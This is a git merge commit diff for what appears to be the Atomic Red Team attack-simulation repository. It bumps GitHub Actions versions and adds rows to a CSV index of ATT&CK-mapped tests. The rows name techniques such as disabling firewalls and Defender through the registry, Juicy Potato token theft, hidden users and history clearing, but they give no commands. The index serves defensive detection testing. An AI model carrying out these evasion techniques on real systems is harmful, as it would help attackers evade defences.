Merge branch 'master' into patch-7

2024-03-07 10:11:24 -08:00
parent d234ade71d 4e9698e67c
commit 9d4056fdbf
95 changed files with 4858 additions and 883 deletions
@@ -9,3 +9,8 @@ updates:
    directory: "/" # Location of package manifests
    schedule:
      interval: "weekly"
+  # Maintain dependencies for GitHub Actions
+  - package-ecosystem: "github-actions"
+    directory: "/"
+    schedule:
+      interval: "weekly"
@@ -11,7 +11,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: download-artifact
-        uses: actions/github-script@v6
+        uses: actions/github-script@v7
        with:
          script: |
            let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
@@ -35,7 +35,7 @@ jobs:
        run: unzip labels.zip

      - name: assign-labels-and-reviewers
-        uses: actions/github-script@v6
+        uses: actions/github-script@v7
        with:
          script: |
            let fs = require('fs');
@@ -8,12 +8,12 @@ jobs:
  generate-counter:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
      - name: Install poetry
        run: pipx install poetry
-      - uses: actions/setup-python@v4
+      - uses: actions/setup-python@v5
        with:
          python-version: '3.11.2' 
          cache: 'poetry'
@@ -8,7 +8,7 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
        with:
          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
      - name: setup ruby
@@ -7,7 +7,7 @@ jobs:
  stale:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/stale@v7
+      - uses: actions/stale@v9
        with:
          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
@@ -10,11 +10,11 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
      - name: Install poetry
        run: pipx install poetry
      - name: setup python3.11
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
        id: setup-python
        with:
          python-version: "3.11.2"
@@ -30,8 +30,8 @@ jobs:
  validate-terraform:
    runs-on: ubuntu-latest
    steps:
-      - uses: actions/checkout@v3
-      - uses: hashicorp/setup-terraform@v2
+      - uses: actions/checkout@v4
+      - uses: hashicorp/setup-terraform@v3

      - name: Terraform fmt
        id: fmt
@@ -42,16 +42,16 @@ jobs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v3
+        uses: actions/checkout@v4
      - name: Install poetry
        run: pipx install poetry
      - name: setup python3.11
-        uses: actions/setup-python@v4
+        uses: actions/setup-python@v5
        id: setup-python
        with:
          python-version: "3.11.2"
          cache: "poetry"
-      - uses: actions/github-script@v6
+      - uses: actions/github-script@v7
        id: get_pr_number
        with:
          script: |
@@ -74,7 +74,7 @@ jobs:
      - name: save labels and reviewers into a file.
        run: |
          poetry run python bin/generate_labels.py  -t  ${{ secrets.GITHUB_TOKEN }} -pr '${{steps.get_pr_number.outputs.result}}'
-      - uses: actions/upload-artifact@v3
+      - uses: actions/upload-artifact@v4
        with:
          name: labels.json
          path: pr/
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1532-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -13,6 +13,7 @@ defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution o
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
+defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,14,Running DLL with .init extension and function,2d5029f0-ae20-446f-8811-e7511b58e8b6,command_prompt
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
 defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
@@ -68,6 +69,7 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
+defense-evasion,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
@@ -238,77 +240,79 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,20,LockBit Black - Unusual Windows firewall registry modification -cmd,a4651931-ebbb-4cde-9363-ddf3d66214cb,command_prompt
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,LockBit Black - Unusual Windows firewall registry modification -Powershell,80b453d1-eec5-4144-bf08-613a6c3ffe12,powershell
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
+defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
 defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
-defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
-defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
-defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
-defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
-defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
-defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
-defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
-defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
-defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
-defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
-defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
-defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
-defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
-defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
-defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
-defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
-defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
-defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
-defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
-defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
-defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
-defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
-defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
-defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
-defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
-defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
-defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
-defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
-defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
-defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
-defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
-defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
-defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
-defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
-defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
-defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
-defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
-defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
-defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
-defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
-defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
-defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
-defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
-defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
-defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
-defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
-defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
-defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
-defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
-defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
-defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
-defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
-defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
-defense-evasion,T1112,Modify Registry,58,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
-defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
-defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
-defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
-defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
-defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
-defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
-defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
-defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
-defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
-defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
+defense-evasion,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
+defense-evasion,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
+defense-evasion,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
+defense-evasion,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
+defense-evasion,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
+defense-evasion,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
+defense-evasion,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
+defense-evasion,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
+defense-evasion,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
+defense-evasion,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
+defense-evasion,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
+defense-evasion,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
+defense-evasion,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
+defense-evasion,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
+defense-evasion,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
+defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
+defense-evasion,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
+defense-evasion,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
+defense-evasion,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
+defense-evasion,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
@@ -380,19 +384,22 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
-defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
